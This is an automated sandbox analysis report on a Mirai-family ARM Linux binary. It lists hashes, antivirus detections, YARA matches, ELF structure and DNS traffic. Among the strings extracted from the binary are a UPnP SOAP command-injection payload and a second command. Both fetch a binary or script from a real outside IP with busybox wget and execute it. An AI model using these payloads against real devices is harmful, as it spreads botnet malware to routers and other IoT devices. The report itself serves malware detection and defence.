Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
UnHAnaAW.arm.elf

Overview

General Information

Sample name:UnHAnaAW.arm.elf
Analysis ID:1588044
MD5:264c0cdaecd319a0d669cc28de1ab3cf
SHA1:b389aa6afcaade559d9621d0747e11655485584a
SHA256:9d73256eeb2413083e253b7abbbf340bb974bf592d7730d936ade4ec791bb0ef
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:64
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588044
Start date and time:2025-01-10 20:55:31 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 24s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:UnHAnaAW.arm.elf
Detection:MAL
Classification:mal64.troj.linELF@0/0@2/0

Warnings

  • VT rate limit hit for: http://141.98.10.115/bins/x86
  • VT rate limit hit for: http://141.98.10.115/zyxel.sh;

Runtime Messages

Command:/tmp/UnHAnaAW.arm.elf
PID:5511
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

  • system is lnxubuntu20
  • UnHAnaAW.arm.elf (PID: 5511, Parent: 5428, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/UnHAnaAW.arm.elf
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
UnHAnaAW.arm.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    5511.1.00007f0ec4017000.00007f0ec402b000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      Process Memory Space: UnHAnaAW.arm.elf PID: 5511JoeSecurity_Mirai_6Yara detected MiraiJoe Security

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: UnHAnaAW.arm.elfAvira: detected
        Multi AV Scanner detection for submitted file
        Source: UnHAnaAW.arm.elfVirustotal: Detection: 65%Perma Link
        Source: UnHAnaAW.arm.elfReversingLabs: Detection: 68%
        Source: /tmp/UnHAnaAW.arm.elf (PID: 5511)Socket: 127.0.0.1:23455Jump to behavior
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: UnHAnaAW.arm.elfString found in binary or memory: http://141.98.10.115/bins/x86
        Source: UnHAnaAW.arm.elfString found in binary or memory: http://141.98.10.115/zyxel.sh;
        Source: UnHAnaAW.arm.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: UnHAnaAW.arm.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.115 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://141.98.10.115/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: classification engineClassification label: mal64.troj.linELF@0/0@2/0
        Source: /tmp/UnHAnaAW.arm.elf (PID: 5511)Queries kernel information via 'uname': Jump to behavior
        Source: UnHAnaAW.arm.elf, 5511.1.00007ffd821aa000.00007ffd821cb000.rw-.sdmpBinary or memory string: ax86_64/usr/bin/qemu-arm/tmp/UnHAnaAW.arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/UnHAnaAW.arm.elf
        Source: UnHAnaAW.arm.elf, 5511.1.00005628a57df000.00005628a590d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
        Source: UnHAnaAW.arm.elf, 5511.1.00007ffd821aa000.00007ffd821cb000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
        Source: UnHAnaAW.arm.elf, 5511.1.00007ffd821aa000.00007ffd821cb000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
        Source: UnHAnaAW.arm.elf, 5511.1.00005628a57df000.00005628a590d000.rw-.sdmpBinary or memory string: (V!/etc/qemu-binfmt/arm

        Stealing of Sensitive Information

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: UnHAnaAW.arm.elf, type: SAMPLE
        Source: Yara matchFile source: 5511.1.00007f0ec4017000.00007f0ec402b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: UnHAnaAW.arm.elf PID: 5511, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Mirai
        Source: Yara matchFile source: UnHAnaAW.arm.elf, type: SAMPLE
        Source: Yara matchFile source: 5511.1.00007f0ec4017000.00007f0ec402b000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: UnHAnaAW.arm.elf PID: 5511, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
        Security Software Discovery        		Remote ServicesData from Local System1
        Non-Application Layer Protocol        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Application Layer Protocol        		Exfiltration Over BluetoothNetwork Denial of Service

        Malware Configuration

        No configs have been found

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        UnHAnaAW.arm.elf66%VirustotalBrowse
        UnHAnaAW.arm.elf68%ReversingLabsLinux.Trojan.Mirai
        UnHAnaAW.arm.elf100%AviraEXP/ELF.Mirai.Bootnet.o

        Dropped Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        daisy.ubuntu.com
        		162.213.35.25
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://141.98.10.115/bins/x86UnHAnaAW.arm.elffalse
            		unknown
            http://141.98.10.115/zyxel.sh;UnHAnaAW.arm.elffalse
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/UnHAnaAW.arm.elffalse
                		high
                http://schemas.xmlsoap.org/soap/envelope/UnHAnaAW.arm.elffalse
                  		high

                  World Map of Contacted IPs

                  No contacted IP infos

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  daisy.ubuntu.comwoega6.elfGet hashmaliciousUnknownBrowse
                  • 162.213.35.24
                  ssc.elfGet hashmaliciousGafgytBrowse
                  • 162.213.35.24
                  frosty.arm5.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  frosty.arm6.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  frosty.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  main_sh4.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  wind.mpsl.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  wind.arm.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24
                  wind.arm6.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.25
                  wind.arm7.elfGet hashmaliciousMiraiBrowse
                  • 162.213.35.24

                  ASNs

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                  Entropy (8bit):6.026069757990742
                  TrID:
                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                  File name:UnHAnaAW.arm.elf
                  File size:82'940 bytes
                  MD5:264c0cdaecd319a0d669cc28de1ab3cf
                  SHA1:b389aa6afcaade559d9621d0747e11655485584a
                  SHA256:9d73256eeb2413083e253b7abbbf340bb974bf592d7730d936ade4ec791bb0ef
                  SHA512:efbb85c673f18ce4c52b025a94dc26dc60785be27d8d517de9ba7bf6efa1bd7fca2e1560e9de10f50549f582bcf0471bb47f962e529c3e44865c8a061f7872f4
                  SSDEEP:1536:ssCvlPf6NDyL9Jb0+pHXlzPhha0xT45wn6ahWNrTRKW57nHM35njC:ssCvlPCuTxCwn1hikWC3F
                  TLSH:8383F79278C29A16C6E423BBFA7E018D332567A8D2DF32179C212F1577C981F0DB7691
                  File Content Preview:.ELF...a..........(.........4...lB......4. ...(......................=...=...............@...@...@..,...H...........Q.td..................................-...L."...VL..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                  Static ELF Info

                  ELF header

                  Class:ELF32
                  Data:2's complement, little endian
                  Version:1 (current)
                  Machine:ARM
                  Version Number:0x1
                  Type:EXEC (Executable file)
                  OS/ABI:ARM - ABI
                  ABI Version:0
                  Entry Point Address:0x8190
                  Flags:0x202
                  ELF Header Size:52
                  Program Header Offset:52
                  Program Header Size:32
                  Number of Program Headers:3
                  Section Header Offset:82540
                  Section Header Size:40
                  Number of Section Headers:10
                  Header String Table Index:9

                  Sections

                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                  NULL0x00x00x00x00x0000
                  .initPROGBITS0x80940x940x180x00x6AX004
                  .textPROGBITS0x80b00xb00x131900x00x6AX0016
                  .finiPROGBITS0x1b2400x132400x140x00x6AX004
                  .rodataPROGBITS0x1b2540x132540xb2c0x00x2A004
                  .ctorsPROGBITS0x240000x140000x80x00x3WA004
                  .dtorsPROGBITS0x240080x140080x80x00x3WA004
                  .dataPROGBITS0x240140x140140x2180x00x3WA004
                  .bssNOBITS0x2422c0x1422c0x31c0x00x3WA004
                  .shstrtabSTRTAB0x00x1422c0x3e0x00x0001

                  Program Segments

                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                  LOAD0x00x80000x80000x13d800x13d806.06650x5R E0x8000.init .text .fini .rodata
                  LOAD0x140000x240000x240000x22c0x5482.95770x6RW 0x8000.ctors .dtors .data .bss
                  GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                  Network Behavior

                  Network Port Distribution

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 10, 2025 20:56:22.986310959 CET5210653192.168.2.141.1.1.1
                  Jan 10, 2025 20:56:22.986360073 CET5453053192.168.2.141.1.1.1
                  Jan 10, 2025 20:56:22.993338108 CET53545301.1.1.1192.168.2.14
                  Jan 10, 2025 20:56:22.993535042 CET53521061.1.1.1192.168.2.14

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jan 10, 2025 20:56:22.986310959 CET192.168.2.141.1.1.10xe9f5Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                  Jan 10, 2025 20:56:22.986360073 CET192.168.2.141.1.1.10x8208Standard query (0)daisy.ubuntu.com28IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jan 10, 2025 20:56:22.993535042 CET1.1.1.1192.168.2.140xe9f5No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                  Jan 10, 2025 20:56:22.993535042 CET1.1.1.1192.168.2.140xe9f5No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                  System Behavior

                  General

                  Start time (UTC):19:56:20
                  Start date (UTC):10/01/2025
                  Path:/tmp/UnHAnaAW.arm.elf
                  Arguments:/tmp/UnHAnaAW.arm.elf
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                  Chronological Activities